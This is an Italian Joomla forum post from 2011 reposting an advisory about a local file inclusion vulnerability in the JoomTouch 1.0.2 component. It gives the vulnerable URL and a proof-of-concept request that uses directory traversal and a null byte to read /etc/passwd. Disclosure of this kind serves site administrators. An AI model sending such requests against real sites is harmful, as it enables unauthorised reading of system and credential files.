Joomla.it Forum

Non solo Joomla... => Sicurezza => : jeckodevelopment 18 Aug 2011, 09:54:13

: Joomla JoomTouch 1.0.2 LFI Vulnerability
: jeckodevelopment 18 Aug 2011, 09:54:13

Joomla Component JoomTouch 1.0.2 Local File Inclusion Vulnerability

:

[o] JoomTouch Joomla Component <= Local File Inclusion Vulnerability
 
 Software : com_joomtouch ver 1.0.2
 Vendor   : http://www.joomtouch.com/
 
 ===========================================================================
 =====
 
 [o] Exploit
 
 
 http://localhost/[path]/index.php?option=com_joomtouch&controller=[LFI]
 
 
 
 [o] PoC
 
 
 http://localhost/[path]/index.php?option=com_joomtouch&controller=../..
 /../../../../../../../../../../../../../../../../../etc/passwd%00
 
Non si hanno ulteriori informazioni sulla presunta vulnerabilità né sul ciclo di sviluppo dell'estensione